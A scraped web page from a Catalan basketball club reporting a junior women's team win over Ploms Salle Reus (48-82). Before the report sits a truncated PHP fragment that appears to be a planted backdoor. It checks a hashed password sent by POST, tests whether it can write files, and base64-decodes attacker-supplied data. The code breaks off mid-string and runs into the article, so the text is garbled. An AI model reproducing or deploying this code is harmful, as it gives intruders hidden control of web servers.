function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení A desplega el seu millor joc a partir del segon quart i derrota el Ploms Salle Reus (48-82) - Tgn Bàsquet Club -

El júnior femení A desplega el seu millor joc a partir del segon quart i derrota el Ploms Salle Reus (48-82)

Updated: març 3, 2020

L’equip júnior femení A es va imposar clarament al Ploms Salle Reus en un matx que va estar competit durant els primers deu minuts. El conjunt lila va millorar les seves prestacions a partir del segon quart (10-10 en el primer període) i amb un parcial de 10-32 va arribar al descans amb un marcador de 20-42. La defensa i el criteri a l’hora de circular la pilota van desfer la resistència de les locals.